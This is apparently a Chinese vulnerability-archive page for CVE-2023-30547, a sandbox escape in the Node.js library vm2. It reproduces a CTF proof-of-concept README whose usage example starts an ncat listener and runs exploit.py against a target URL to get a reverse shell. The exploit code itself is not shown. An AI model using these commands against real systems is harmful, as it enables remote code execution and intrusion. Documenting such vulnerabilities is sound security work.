关联漏洞
标题:
vm2 注入漏洞
(CVE-2023-30547)
描述:vm2是捷克Patrik Simek个人开发者的一个 Node.js 的高级虚拟机/沙盒。以使用列入白名单的 Node 内置模块运行不受信任的代码。 vm2 3.9.17之前版本存在注入漏洞,该漏洞源于异常清理存在漏洞,攻击者利用该漏洞可以引发未清理的主机异常,该异常可用于逃逸沙箱并在主机上下文中运行任意代码。
描述
PoC to CVE-2023-30547 (Library vm2)
介绍
# CVE-2023-30547
This is a Proof-of-Concept to CVE-2023-30547 (https://nvd.nist.gov/vuln/detail/CVE-2023-30547). I created this PoC during a CTF.
## Usage
```bash
CVE-2023-30547 PoC [-h] [--url URL] [--lhost LHOST] [--lport LPORT]
PoC for the vm2 vulnerability CVE-2023-30547
options:
-h, --help show this help message and exit
--url URL Target URL
--lhost LHOST IP of the local host for a reverse shell
--lport LPORT Port of the local host for a reverse shell
```
## Example:
1. Terminal:
```bash
$ ncat -lnvp 1337
```
2. Terminal:
```bash
$ python3 exploit.py --url "http://vulnhost.local/run" --lhost 127.0.0.1 --lport 1337
```
文件快照
[4.0K] /data/pocs/289c3aa9ea3cad7f2e251f3e4e8fc3f87b60435d
├── [1.9K] exploit.py
├── [ 18K] LICENSE
└── [ 654] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。